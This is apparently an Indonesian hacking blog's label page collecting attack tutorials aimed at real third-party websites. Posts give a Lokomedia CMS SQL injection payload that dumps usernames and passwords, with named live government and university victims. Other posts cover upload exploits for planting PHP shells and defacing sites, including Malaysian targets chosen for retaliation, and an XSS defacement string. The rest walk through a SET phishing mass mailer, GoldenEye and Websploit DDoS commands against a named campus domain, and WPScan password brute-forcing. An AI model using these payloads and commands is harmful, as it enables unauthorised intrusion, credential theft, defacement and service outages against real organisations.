BREAKING NEWS
Tampilkan postingan dengan label Exploit. Tampilkan semua postingan
Tampilkan postingan dengan label Exploit. Tampilkan semua postingan

[Exploit] Lokomedia CMS, CMS Remote SQL Injection Exploit Vulnerability

[Exploit] Lokomedia CMS CMS Remote SQL Injection Exploit Vulnerability


###########################
# Lokomedia CMS CMS Remote SQL Injection Exploit Vulnerability
###########################

[Exploit] Lokomedia CMS, CMS Remote SQL Injection Exploit Vulnerability
[Exploit] Lokomedia CMS, CMS Remote SQL Injection Exploit Vulnerability


=========================================================
[+] Title :- Lokomedia CMS CMS Remote SQL Injection Exploit Vulnerability
[+] Vendor Homepage :- http://www.bukulokomedia.com/
[+] Version :- All Versions
[+] Tested on :- Linux - Windows - Mac
[+] Category :- webapps
[+] Exploit Author :- K33P-S1L3NT
[+] Team name :- Ternate Lab Pentesting
[+] Official Page :- www.facebook.com/loading.gov/
[+] Available :- sql injection cheat sheet | sql injection Remote exploit
[+] Greedz to :- Indonesian People | Sarang-Paniki | Sarang-Bifi | Kamar-Muka | DZ hacker's | Algerian Hack 
[+] Contact :- aurorakoizora@gmail.com

=========================================================
[+] Severity Level :- Medium

[+] Request Method(s) :- GET / POST

[+] Vulnerable Parameter(s) :- id,
      statis-1-profil.html (string ) 
      statis-3-strukturorganisasi.html (string )
      statis-1-visimisi.html (string)
      statis-1-tujuan.html  (string)

[+] Dork : - 
      statis-1-profil.html (work100% ) 
      statis-3-strukturorganisasi.html (work100% )
      statis-1-visimisi.html (work100%)
      statis-1-tujuan.html  (work100%)

[+] Local Admin 
     /redaktur
     /adminweb
     /administrator
     /redaktur/index.php
     /adminlogin
     /admin
     /login.php

[+] Affected Area(s) :- Entire admin, database, Server

[+] About :- Unauthenticated SQL Injection via Multiple Php Files causing an SQL error

[+] SQL vulnerable File :- /home/user/public_html/XXX.php

[+] POC : http://127.0.0.1/statis-1( exploit-code )profil.html
              - http://127.0.0.1/statis-3( exploit-code )strukturorganisasi.html
              - http://127.0.0.1/statis-1( exploit-code )visimisi.html
              - http://127.0.0.1/statis-1( exploit-code )tujuan.html

########################################################
[+] Exploit 

/statis-1'union+select+make_set(6,@:=0x0a,   (select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+

##########################################################
[+] Testing 

http://127.0.0.1/statis-1'union+select+make_set(6,@:=0x0a,   (select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+profil.html

[+] NOTE 
 username & password open on title-bar  or  CTRL+U for view username & password this website exploit

###########################################################
[+] LIVE 

http://portal.ukit.ac.id ( Title-bar  http://i.imgur.com/mYXPvpG.png ) ( CRTL+U http://i.imgur.com/2zKzC5o.png )
http://www.ptun-padang.go.id ( Title-bar http://i.imgur.com/3ZdoHaI.png ) ( CTRL+U http://i.imgur.com/eX1qKc5.png )
http://www.anambaskab.go.id ( Title-bar http://i.imgur.com/o4gQd0o.png ) ( CTRL+U http://i.imgur.com/WOriRul.png )

Semoga Bermanfaat :D
Sumber : 

Download

Laporkan Jika Link Download Mati ! disini. [ Lapor !! ]
>> Fuck You ! ------------------------ // ~ root@Jack : ~ \\------------------------ Fuck You ! <<
Download Kumpulan Tools Hacking 100% Work
[ DOWNLOAD ] - [ DOWNLOAD ]

Yapss Admin mohon maaf jika ada kesalahan dalam penulisan atau penguploadan, jika ada kesalahan mohon dibenarkan dengan berkomentar di bawah postingan yang salah, berikan saran yang sifatnya membimbing agar blog ini bisa bermanfaat bagi para Newbie di Indonesia tentunya, Jika ingin menyumbangkan Tutornya atau Modulnya silahkan kirimkan ke Email yang sudah saya sediakan, Terimakasih Senpai :*

Greetz : ./Maniak_WiFi

\\ Like, Visit, Follow and Share
>> Facebook          **    Faris Ghaisan Rabbani    >> Twitter          **    @JackTersakiti
>> Instagram          **    /abdur.rozak.mw    >> Youtube        **   Pringsewu Cyber Team
// Why So Serious...

Cara Deface Website Malaysia si Lucknut !

Cara Deface Website Malaysia si Lucknut !


Assalamu'alaikum WR WB selamat pagi para pecinta pinguin yang tercinta :D, dipagi ini dapet berita yang menjengkelkan dimana bendera Negara Kesatuan Republik Indonesia dilecehkan di ajang Internasional, tentu kita sebagai warga Negara yang baik tidak akan tinggal diam dong, mari kita balas dengan prestasi untuk yang ikut Ajang tersebut, sedangkan kita yang disini harus berbuat sesuatu :D

Cara Deface Website Malaysia si Lucknut !
Cara Deface Website Malaysia si Lucknut !
Berikut Macam Tekhnik yang sangat Mudah :D

Deface Metode Com_Fabrik



Dork Com_Fabrik

inurl:index.php?option=com_fabrik site:my
inurl:viewTable?cid= site:my

Exploit

index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1

Contoh

Wesite Target
http://e-jobs.felda.net.my/

Tambahkan Exploit menjadi
http://e-jobs.felda.net.my/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1


Baca Juga.





Vuln

Jika vuln akan muncul form Upload CRV
upload file anda, contoh saya upload format [ .jpg ]

Hasil

Untuk melihatnya tambahkan /media/ dibelakan domain
http://e-jobs.felda.net.my/media/
kemudian ketik nama file yang anda upload sehingga menjadi
http://e-jobs.felda.net.my/media/sial.jpg

Oke semoga bermanfaat Dunia dan Akherat :D

Download

Laporkan Jika Link Download Mati ! disini. [ Lapor !! ]


Download Kumpulan Tools Hacking 100% Work
[ DOWNLOAD ] - [ DOWNLOAD ]

Yapss Admin mohon maaf jika ada kesalahan dalam penulisan atau penguploadan, jika ada kesalahan mohon dibenarkan dengan berkomentar di bawah postingan yang salah, berikan saran yang sifatnya membimbing agar blog ini bisa bermanfaat bagi para Newbie di Indonesia tentunya, Jika ingin menyumbangkan Tutornya atau Modulnya silahkan kirimkan ke Email yang sudah saya sediakan, Terimakasih Senpai :*

Greetz : ./Maniak_WiFi

\\ Like, Visit, Follow and Share

>> Facebook          **    Jack Shredder
>> Instagram          **    /abdur.rozak.mw
>> Twitter          **    @JackTersakiti
>> Youtube        **   Pringsewu Cyber Team
>> BBM           **   57318B69

// Why So Serious...

Deface Website Alstrasoft ProTaxi Enterprise 3.5 Metode File Upload Vulnerability

Deface Website Alstrasoft ProTaxi Enterprise 3.5 Metode File Upload Vulnerability


Selamat malam para pencinta binatang :v, okeh kali ini ane sedikit mau kasih tutor ini, sebelumnya maaf jika jarang posting dikarenakan agenda yang padat di Perkuliahan karena sudah Semester 7 yah udah mulai garap" Skripsi, dan kerja juga sangat melelahkan sekali.

Deface Website Alstrasoft ProTaxi Enterprise 3.5 Metode File Upload Vulnerability
Deface Website Alstrasoft ProTaxi Enterprise 3.5 Metode File Upload Vulnerability


Sekarang materinya masih untuk tinggat Lammer yah yaitu File Upload ajah yang mudah, jadi rule nya ente hanya perlu memiliki email, kemudian ente daftar, lalu ente upload shell dan croot. hahaha, Udah intinya gitu doang sebenernya gx ada yang ribet :v

Dork Google

inurl:/user/signin intext:SIGN IN NOW
inurl:public/user/signup
inurl:public/user/signup site:.id
Gunakan otak vokep ente untuk mendapatkan target yang verawan :D

Langkah Defacenya

1. Buka browser tercinta anda, kopykan Dork lalu Pastekan, dan lihat ada banyak target yang bisa ente testing :D

Deface Website Alstrasoft ProTaxi Enterprise 3.5 Metode File Upload Vulnerability
Deface Website Alstrasoft ProTaxi Enterprise 3.5 Metode File Upload Vulnerability


2. Pilih salah satu target, contohnya seperti dibawah ini :
http://steamsa.com/user/signin
Klik dibagian bawah pada kata [ Create an Account ], nanti akan muncul seperti gambar dibawah ini :D
Isikan Form sesuka ente, yang perlu di ingat hanya [ Email dan Password ] :p, jika sudah puas silahkan klik [ Register ].


Deface Website Alstrasoft ProTaxi Enterprise 3.5 Metode File Upload Vulnerability
Deface Website Alstrasoft ProTaxi Enterprise 3.5 Metode File Upload Vulnerability


3. Jika pendaftaran berhasil maka akan muncul Notive : [ You have successfully registered. Please Login ], lalu isikan [ Email dan Password ] untuk Sign In.

Deface Website Alstrasoft ProTaxi Enterprise 3.5 Metode File Upload Vulnerability
Deface Website Alstrasoft ProTaxi Enterprise 3.5 Metode File Upload Vulnerability


4. Jika berhasil Sign In maka akan masuk ke Dashboard, kemudian ente pilih Menu Profile seperti dibawah ini.

Deface Website Alstrasoft ProTaxi Enterprise 3.5 Metode File Upload Vulnerability
Deface Website Alstrasoft ProTaxi Enterprise 3.5 Metode File Upload Vulnerability


5. Klik Browse dan pilih Shell Backdoor anda, disini saya menggunakan format [ .php ], pilih kemudian klik Update Profile.

Deface Website Alstrasoft ProTaxi Enterprise 3.5 Metode File Upload Vulnerability
Deface Website Alstrasoft ProTaxi Enterprise 3.5 Metode File Upload Vulnerability


6. Jika berhasil maka gambar pada Photo akan menjadi pecah seperti gambar dibawah ini, klik kanan lalu Copy Image Location.

Deface Website Alstrasoft ProTaxi Enterprise 3.5 Metode File Upload Vulnerability
Deface Website Alstrasoft ProTaxi Enterprise 3.5 Metode File Upload Vulnerability


7. Buka Tab baru dan Paste dah disitu, jika berhasil maka akan terbuka dah Shell Backdoor ente, login ke shell ente.

Deface Website Alstrasoft ProTaxi Enterprise 3.5 Metode File Upload Vulnerability
Deface Website Alstrasoft ProTaxi Enterprise 3.5 Metode File Upload Vulnerability


8. Ok sudah berhasil masuk ke Shellnya, sekarang saatnya sedikit penghujatan dengan upload script deface ente :D

Deface Website Alstrasoft ProTaxi Enterprise 3.5 Metode File Upload Vulnerability
Deface Website Alstrasoft ProTaxi Enterprise 3.5 Metode File Upload Vulnerability


9. Inilah script deface sederhana ane yang berhasil bersemayam di Website target :D

Deface Website Alstrasoft ProTaxi Enterprise 3.5 Metode File Upload Vulnerability
Deface Website Alstrasoft ProTaxi Enterprise 3.5 Metode File Upload Vulnerability

Oke itulah trik untuk para Lammer yang ingin belajar, :v   ane juga masih Lammer yg penting mau belajar :p
Maaf untuk semuanya jika penjelasan ini kurang jelas :v


Sumber

http://www.tkjcyberart.org/2017/04/exploit-alstrasoft-protaxi-enterprise.html



\\ ::::::::::::::: || My Contact || ::::::::::::::: //

>> Facebook     **   Abdur Rozak (Script Kiddie) 
>> Twitter          **    @JackTersakiti
>> Youtube        **   Jack Holeader | Siti Nur Holida
>> Instagram      **   jack_holida
>> BBM           **   57318B69
>> LINE          **   jack_tersakiti

// :::::::: || Why So Serious || ::::::::: \\

Deface CMS WordPress Metode Exploit Dreamwork Gallery

Deface CMS WordPress Metode Exploit Dreamwork Gallery


Deface CMS WordPress Metode Exploit Dreamwork Gallery
Deface CMS WordPress Metode Exploit Dreamwork Gallery


Selamat malam para bokepers, oke kali ini gw mau bahas tehnik deface dengan memanfaatkan bug di Plugin CMS Wordpress, entah kapan tehnik ini ditemukan gw jg kgx ngerti yahh, exploit ini untuk plugin Dreamwork Gallery.

Dork Dreamwork Gallery

Gunakan imajinasi ente untuk dapetin target yang verawan :D
inurl:/wp-content/plugins/wp-dreamworkgallery/
inurl:/wp-dreamworkgallery/ site:.id

Script Uploader

Bisa di download di sini [ PASTEBIN ]

atau bisa copy langsung nih script dibawah ini :D
<html>
<body>
<form action="http://www.site.com/[path]/wp-admin/admin.php?page=dreamwork_manage" method="POST" enctype="multipart/form-data">
<input type="hidden" name="task" value="drm_add_new_album" />
<input type="hidden" name="album_name" value="Arbitrary File Upload" />
<input type="hidden" name="album_desc" value="Arbitrary File Upload" />
<input type="file" name="album_img" value="" />
<input type="submit" value="Submit" />
</form>
</body>
</html>
www.site.com = ganti dengan domain target anda :v
[path] = jika target ada path, jika tidak iya langsung di tusuk jahh :D


Langkah Exploit Dreamwork Gallery

1. Buka browser tercinta anda, copy Dork dan paste di Search Engine ente, akan muncul banyak target yang tampil tuh, bisa di lihat dibawah ini.

Deface CMS WordPress Metode Exploit Dreamwork Gallery
Deface CMS WordPress Metode Exploit Dreamwork Gallery


2. Pilih salah satu target, buka di tab baru, kurang lebih seperti dibawah ini, gx usah di pentingin ini mah, yg penting kita ambil URL domainnya aja :D

Deface CMS WordPress Metode Exploit Dreamwork Gallery
Deface CMS WordPress Metode Exploit Dreamwork Gallery


3. Copy Script Uploadernya, paste di Notepad simpan dengan nama [ uploader.html ].

Deface CMS WordPress Metode Exploit Dreamwork Gallery
Deface CMS WordPress Metode Exploit Dreamwork Gallery


4. Lalu buka file [ uploader.html ] di browser seperti dibawah ini :D

Deface CMS WordPress Metode Exploit Dreamwork Gallery
Deface CMS WordPress Metode Exploit Dreamwork Gallery


5. Klik Browse dan pilih script Deface ente seperti dibawah ini :D, pilih script deface dan klik Open, Habis itu klik Submit untuk proses Uploadnya.

Deface CMS WordPress Metode Exploit Dreamwork Gallery
Deface CMS WordPress Metode Exploit Dreamwork Gallery


6. Tunggu beberapa saat, jika muncul seperti dibawah ini kemungkinan berhasil :D, Copy URL yang diblock itu, dan paste di browser.

Deface CMS WordPress Metode Exploit Dreamwork Gallery
Deface CMS WordPress Metode Exploit Dreamwork Gallery


7. Jika berhasil maka akan tampil dah script deface ente :D

Deface CMS WordPress Metode Exploit Dreamwork Gallery
Deface CMS WordPress Metode Exploit Dreamwork Gallery

Udah gitu ajaa,, simple banget kann. Gunakan otak mesum anda untuk mencari target yang verawan brooww :v

Sumber

http://www.tkjcyberart.org/2017/04/exploit-dreamwork-gallery-file-upload.html



\\ ::::::::::::::: || My Contact || ::::::::::::::: //

>> Facebook     **   Abdur Rozak (Script Kiddie) 
>> Twitter          **    @JackTersakiti
>> Youtube        **   Jack Holeader | Siti Nur Holida
>> Instagram      **   jack_holida
>> BBM           **   57318B69
>> LINE          **   jack_tersakiti

// :::::::: || Why So Serious || ::::::::: \\

Cara Mass Mailer dengan Setoolkit di Kali Linux

Cara Mass Mailer dengan Setoolkit di Kali Linux


Cara Mass Mailler dengan Setoolkit di Kali Linux
Cara Mass Mailler dengan Setoolkit di Kali Linux


Pengertian Mass Mailler

Mass Mailler adalah suatu kegiatan mengirim email tetapi tujuan email kita untuk banyak email, intinya kita mengirim email yang sama ke semua email yang sudah disiapkan dengan sekali kirim saja.

Untuk melakukan ini kita memerlukan tools disini saya menggunakan tool Setoolkit yang sudah disediakan di Kali Linux.

Persiapan Mass Mailler

Kita siapkan dahulu target kita, atau email-email yang akan kita eksekusi, ketikkan di Note dan simpan di Destop dengan format.txt

Cara Mass Mailler dengan Setoolkit di Kali Linux
Cara Mass Mailler dengan Setoolkit di Kali Linux


Cara Mass Mailer di Kali Linux

1. Buka terminal tercinta anda, lalu ketikkan perintah seperti dibawah ini.
# setoolkit
lalu tekan enter dan tunggu sebentar prosesnya.

Cara Mass Mailler dengan Setoolkit di Kali Linux
Cara Mass Mailler dengan Setoolkit di Kali Linux


2. Jika berhasil terbuka maka akan tampil seperti dibawah ini.

Cara Mass Mailler dengan Setoolkit di Kali Linux
Cara Mass Mailler dengan Setoolkit di Kali Linux


3. Ok sekarang kita mulai, Select from the menu :
set> 1  [ Social Enginering Attacks ]
lalu tekan enter.

Cara Mass Mailler dengan Setoolkit di Kali Linux
Cara Mass Mailler dengan Setoolkit di Kali Linux


4. Setelah itu Select from the menu :
set> 5  [ Mass Mailer Attack ]

Cara Mass Mailler dengan Setoolkit di Kali Linux
Cara Mass Mailler dengan Setoolkit di Kali Linux


5. Kemudian What do you want to do :
set:mailer> 2  [ E-Mail Attack Mass Mailer ]

Cara Mass Mailler dengan Setoolkit di Kali Linux
Cara Mass Mailler dengan Setoolkit di Kali Linux


6. Kemudian pada langkah berikut ini, kita Import file txt kita yang uda kita siapakan diatas.
set:phishing> Path to the file to import into SET : /home/jackholeader/Destop/email-crot.txt


Cara Mass Mailler dengan Setoolkit di Kali Linux
Cara Mass Mailler dengan Setoolkit di Kali Linux


7. Kemudian kita pilih no 1.
set:phishing> 1  [ Use a gmail Account for your email attack. ]

Cara Mass Mailler dengan Setoolkit di Kali Linux
Cara Mass Mailler dengan Setoolkit di Kali Linux


8. Kemudian tuliskan email ente :
set:phishing> Your gmail email address : jackholida@gmail.com

Cara Mass Mailler dengan Setoolkit di Kali Linux
Cara Mass Mailler dengan Setoolkit di Kali Linux


9. Kemudian isikan user.
set:phishing> The FROM NAME the user will see : jackholida
Email password : ( isi password email ente )

Cara Mass Mailler dengan Setoolkit di Kali Linux
Cara Mass Mailler dengan Setoolkit di Kali Linux


10. Jika muncul seperti ini pilih NO
set:phishing> Flag this message/s as high priority ? [yes|no] : no

Cara Mass Mailler dengan Setoolkit di Kali Linux
Cara Mass Mailler dengan Setoolkit di Kali Linux


11. Lalu jika muncul pernyataan seperti ini, pilih y
Do you want to attach a file - [y/n] : y

Cara Mass Mailler dengan Setoolkit di Kali Linux
Cara Mass Mailler dengan Setoolkit di Kali Linux


12. Setelah itu jika muncul pertanyaan seperti dibawah ini.
Enter the path to the file you want to attach : Mass Email Maniak_WiFi

Cara Mass Mailler dengan Setoolkit di Kali Linux
Cara Mass Mailler dengan Setoolkit di Kali Linux


13. Kemudian isi Subject.
set:phishing> Email subject : Testing Mass Email Ajahh

Cara Mass Mailler dengan Setoolkit di Kali Linux
Cara Mass Mailler dengan Setoolkit di Kali Linux


14. Jika seperti dibawah ini pilih p ( plain )
set:phishing> Send the message as html or plain ? 'h' or 'p' [p] : p

Cara Mass Mailler dengan Setoolkit di Kali Linux
Cara Mass Mailler dengan Setoolkit di Kali Linux


15. Kemudian isikan Body message atau isi pesan, tekan enter untuk next line, jika sudah ketik [ END ] huruf kapital semua, lalu takan enter.

Cara Mass Mailler dengan Setoolkit di Kali Linux
Cara Mass Mailler dengan Setoolkit di Kali Linux


16. Kemudian tools akan mengeksekusi secara otomatis, mengirimkan email ke semua email yang ada di .txt tadi, jika sukses, maka akan muncul seperti ini.
SET  has finished sending the emails

Cara Mass Mailler dengan Setoolkit di Kali Linux
Cara Mass Mailler dengan Setoolkit di Kali Linux


Ok itulah tutorial sederhana yang bisa saya sampaikan, jika ada pertanyaan silahkan komen saja dibawah.

Download

Cara Mass Mailler dengan Setoolkit di Kali Linux
[ DOWNLOAD ] [ DOWNLOAD ]


\\ ::::::::::::::: || My Contact || ::::::::::::::: //

>> Facebook     **   Abdur Rozak (Script Kiddie) 
>> Twitter          **    @JackTersakiti
>> Youtube        **   Jack Holeader | Siti Nur Holida
>> Instagram      **   jack_holida
>> BBM           **   57318B69
>> LINE          **   jack_tersakiti

// :::::::: || Why So Serious || ::::::::: \\

Cara Deface Website Metode XSS Vulnerability

Cara Deface Website Metode XSS Vulnerability


Pengertian XSS

XSS merupakan kependekan yang digunakan untuk istilah cross site scripting.

XSS merupakan salah satu jenis serangan injeksi code (code injection attack). XSS dilakukan oleh penyerang dengan cara memasukkan kode HTML atau client script code lainnya ke suatu situs. Serangan ini akan seolah-olah datang dari situs tersebut. Akibat serangan ini antara lain penyerang dapat mem-bypass keamanan di sisi klien, mendapatkan informasi sensitif, atau menyimpan aplikasi berbahaya.

Alasan kependekan yang digunakan XSS bukan CSS karena CSS sudah digunakan untuk cascade style sheet.

Dork XSS

Dork XSS yang masih work sampai saat ini.
inurl:"/showcatrows.php?CategoryID="

Langkah Deface dengan XSS

1. Pertama Copy Dork yang telah gw sediain, paste and search di browser tercinta anda :D, kemudian akan ada banyak targe tuh yang sesuai dengan Dorknya, pilih salah satu target dan buka di tab baru :D

Cara Deface Website Metode XSS Vulnerability
Cara Deface Website Metode XSS Vulnerability


2. Ok ini contoh web target saya dengan URL seperti dibawah ini.
http://www.paypalshop.org/showcatrows.php?CategoryID=5

Cara Deface Website Metode XSS Vulnerability
Cara Deface Website Metode XSS Vulnerability


3. Kemudian tambahkan script dibawah ini diURL paling belakang.
"><marquee><h1>DEFACED BY PRINGSEWU CYBER TEAM</h1></marquee>

Contoh
http://www.paypalshop.org/showcatrows.php?CategoryID=5"><marquee><h1>DEFACED BY PRINGSEWU CYBER TEAM</h1></marquee>

Warna Hitam adalah URL asli dan warna Merah adalah Script XSS kita :D

Cara Deface Website Metode XSS Vulnerability
Cara Deface Website Metode XSS Vulnerability
Trik yang sangat simple, semoga bermanfaat dan Stay in My Blog.

Download

Laporkan Jika Link Download Mati ! disini. [ Lapor !! ]


Download Kumpulan Tools Hacking 100% Work
[ DOWNLOAD ] - [ DOWNLOAD ]

Yapss Admin mohon maaf jika ada kesalahan dalam penulisan atau penguploadan, jika ada kesalahan mohon dibenarkan dengan berkomentar di bawah postingan yang salah, berikan saran yang sifatnya membimbing agar blog ini bisa bermanfaat bagi para Newbie di Indonesia tentunya, Jika ingin menyumbangkan Tutornya atau Modulnya silahkan kirimkan ke Email yang sudah saya sediakan, Terimakasih Senpai :*

Greetz : ./Maniak_WiFi

\\ Like, Visit, Follow and Share

>> Facebook          **    Jack Shredder
>> Instagram          **    /abdur.rozak.mw
>> Twitter          **    @JackTersakiti
>> Youtube        **   Pringsewu Cyber Team
>> BBM           **   57318B69

// Why So Serious...

Cara DDoS Attack dengan Golden Eye di Kali Linux | Exploit

Cara DDoS Attack dengan Golden Eye di Kali Linux


Ok kali ini gw mau posting cara DDoS Attack dengan menggunakan tools Golden Eye di Kali Linux tentunya, apa itu DDoS Attack DDoS adalah singkatan dari Distributed Denial of Service, udah itu aja, silahkan searching di Google aja dah, males ngetiknya gw, capek wkwkwk :p

Persiapan

Untuk masukk ke help silahkan ketikkan perintah
# ./goldeneye.py --help
maka akan muncul bantuan yang sekiranya bisa membantu :p

Ok langsung ke tutorialnya

1. Buka terminal terlebih dahulu dan kemudian Copy perintah berikut ini :
# git clone https://github.com/jseidl/GoldenEye
perintah diatas untuk mendownload paket Golden Eye melalui github :D

DDoS Attack dengan Golden Eye di Kali Linux
DDoS Attack dengan Golden Eye di Kali Linux


2. Kemudian masuk ke Direktory GoldenEye dengan cara :
# cd /root/GoldenEye
maka akan masuk ke direktory Golden Eye.

DDoS Attack dengan Golden Eye di Kali Linux
DDoS Attack dengan Golden Eye di Kali Linux


3. Untuk melakukan DDoS Attacknya ketikkan perintah ini :
# ./goldeneye.py <url target> -w 10 -s 10 -m random 
ubah target dengan website tujuan ente, kemudian tekan Enter.
untuk berhenti tekan saja CTRL+C om Senpai :*

DDoS Attack dengan Golden Eye di Kali Linux
DDoS Attack dengan Golden Eye di Kali Linux

Penjelasan Perintah Diatas adalah
-w = 10 workers
-s = 10 simultenious connections
-m = random, a mix of GET and POST

Semoga bermanfaat iyaahh :D

Download

Cara DDoS Attack dengan Golden Eye di Kali Linux | Exploit
[ DOWNLOAD ] [ DOWNLOAD ]

Sumber

http://www.tkjcyberart.org/2016/02/dos-website-dengan-golden-eye-di-kali.html



\\ ::::::::::::::: || My Contact || ::::::::::::::: //

>> Facebook     **   Abdur Rozak (Script Kiddie) 
>> Twitter          **    @JackTersakiti
>> Youtube        **   Jack Holeader | Siti Nur Holida
>> Instagram      **   jack_holida
>> BBM           **   57318B69
>> LINE          **   jack_tersakiti

// :::::::: || Why So Serious || ::::::::: \\

Cara DDoS Attack dengan Websploit | Exploit

Cara DDoS Attack dengan Websploit


Cara DDoS Attack dengan Websploit
Cara DDoS Attack dengan Websploit


Pengertian Websploit

Websploit adalah software yang di kembangkan oleh team Offensife security, yang mempunyai fungsi untuk menganalisis system dimana sebuah kelemahan atau bug akan dicari. Tools ini sudah tersedia di OS Backtrack, Kali Linux dan ParrotOS tapi kalau ada yang menggunakan OS selain itu bisa saja, dengan menggunakan Linux Lain seperti Linux Mint dll.

Websploit adalah penilaian kerentanan, web crawler dan mengeksploitasi alat otomatis. Ini adalah sebuah utilitas baris perintah open source yang terdiri atas struktur modular. Pada saat penulisan, ada 16 modul yang tersedia di Websploit, dapat didownload dari proyek sourceforge situs tetapi tersedia di Kali Linux secara default. 

Feature Websploit


  • Autopwn – Used From Metasploit For Scan and Exploit Target Service
  • wmap – Scan, Crawler Target Used From Metasploit wmap Plugin
  • format infector – inject reverse & bind payload into file format
  • phpmyadmin – Search Target phpmyadmin login page
  • lfi – Scan, Bypass local file inclusion Vulnerability & can be bypass some WAF
  • apache users – search server username directory (if use from apache webserver)
  • Dir Bruter – brute target directory with wordlist
  • admin finder – search admin & login page of target
  • MLITM Attack – Man Left In The Middle, XSS Phishing Attacks
  • MITM – Man In The Middle Attack
  • Java Applet Attack – Java Signed Applet Attack
  • MFOD Attack Vector – Middle Finger Of Doom Attack Vector
  • USB Infection Attack – Create Executable Backdoor For Infect USB For Windows

Cara Membuka Tools Websploit


1. Buka Tools Lewat Aplikasi.
Aplikasi > Parrot / Kali > Web Applicatio Analysis > Web Vulnerability Scanners > Websploit

Cara DDoS Attack dengan Websploit
Cara DDoS Attack dengan Websploit


2. Jika masuk menggunakan Terminal, buka terminal ketik [ websploit ] pastikan di User Root [ # ].

Cara DDoS Attack dengan Websploit
Cara DDoS Attack dengan Websploit


Langkah DDoS Attack dengan Websploit

1. Jika sudah masuk di Toolsnya ketikkan.
wst > show modules
untuk melihat modul yang akan kita gunakan.

Cara DDoS Attack dengan Websploit
Cara DDoS Attack dengan Websploit


ada banyak modul setelah itu langsung ke :

Ini adalah modul yang kita pakai
wsf > use network/webkiller

Perintah ini untuk melihat settingan yang akan kita rubah
wsf:WebKiller > show options

Kemudian Edit Interface dan TARGET dengan cara dibawah ini
Pertintah ini untuk mengedit Interface yang akan digunakan
wsf:WebKiller > set Interface eth0

Perintah ini digunakan untuk mengisi Target yang akan di eksekusi
wsf:WebKiller > set TARGET stmikpringsewu.ac.id

Perintah ini untuk melihat apakah Setting Interface dan Target sudah berhasil.
wsf:WebKiller > show options

Perintah ini utnuk menjalankan / eksekusi DDoS Attack
wsf:WebKiller > run

Lihat Gambar dibawah ini jika kurang jelas :p

Cara DDoS Attack dengan Websploit
Cara DDoS Attack dengan Websploit

Biarkan proses berjalan tinggal minum kopi deh :D

Kesimpulan

Ingat DDoS Attack harus berkelompok kalau sendirian gx guna brooww wkwkkww

Download

Cara DDoS Attack dengan Websploit | Exploit
[ DOWNLOAD ] [ DOWNLOAD ]

Sumber

http://www.mc-crew.or.id/article/websploit.html


\\ ::::::::::::::: || My Contact || ::::::::::::::: //

>> Facebook     **   Abdur Rozak (Script Kiddie) 
>> Twitter          **    @JackTersakiti
>> Youtube        **   Jack Holeader | Siti Nur Holida
>> Instagram      **   jack_holida
>> BBM           **   57318B69
>> LINE          **   jack_tersakiti

// :::::::: || Why So Serious || ::::::::: \\

Cara Brute Force Attack dengan WPScan | Exploit

Cara Brute Force Attack dengan WPScan


Penjelasan Brute Force

Brute Force Attack adalah metode untuk meretas password (password cracking) dengan cara mencoba semua kemungkinan kombinasi yang ada pada “wordlist“. Metode ini dijamin akan berhasil menemukan password yang ingin diretas. Namun, proses untuk meretas password dengan menggunakan metode ini akan memakan banyak waktu. Lamanya waktu akan ditentukan oleh panjang dan kombinasi karakter password yang akan diretas.

Bahan Brute Force

- Target yang Verawan
- Wordlist, lihat [ Cara Membuat Wordlist ]

Persiapan Brute Force

- Letakkan Wordlist di Desktop ( Biar Mudah Nyarinya :p )

Cara Brute Force Attack dengan WPScan
Cara Brute Force Attack dengan WPScan


- Nyari koneksi yang jos, soalnya ini butuh perjuangan yang berat.
- Siapkan Username yang sudah kita dapatkan di Tutorial Mencari Username Wordpress.

Langkah Brute Force Attack dengan WPScan


1. Masuk terminal dan ketikkan perintah berikut ini.
wpscan -u www.target.co.li --wordlist /home/takahiro/Dekstop/wordlist.lst --username usertarget
kemudian tekan Enter maka proses Brute Force akan berjalan.

Cara Brute Force Attack dengan WPScan
Cara Brute Force Attack dengan WPScan


Lihat proses yang begitu ribet seperti dibawah ini :D tinggal tunggu hasilnya ajah :P, semoga aja websitenya gx Down duluan.

Cara Brute Force Attack dengan WPScan
Cara Brute Force Attack dengan WPScan


Kesimpulan


Cari target website besar jika ingin Brute Force biasanya sering Down jika kita lakukan tehnik ini, seperti yang saya alami saat membuat tutor ini wkwkw :D

Tingkat keberhasilan seperti yang saya katakan tadi tergantung dari wordlist anda, jika di wordlist anda ada password yang serupa dengan password login yang kita targetkan maka akan muncul password found.

Download

Cara Brute Force Attack dengan WPScan | Exploit
[ DOWNLOAD ] [ DOWNLOAD ]

Sumber

https://ardikarommysanjaya.wordpress.com/2014/03/25/pengertian-brute-force-attack/
https://indonesianblackhatcyber.blogspot.co.id/2015/09/cara-brute-force-wordpress-dengan-wpscan.html


\\ ::::::::::::::: || My Contact || ::::::::::::::: //

>> Facebook     **   Abdur Rozak (Script Kiddie) 
>> Twitter          **    @JackTersakiti
>> Youtube        **   Jack Holeader | Siti Nur Holida
>> Instagram      **   jack_holida
>> BBM           **   57318B69
>> LINE          **   jack_tersakiti

// :::::::: || Why So Serious || ::::::::: \\
 
Copyright © 2014 Abdur Rozak. Designed by OddThemes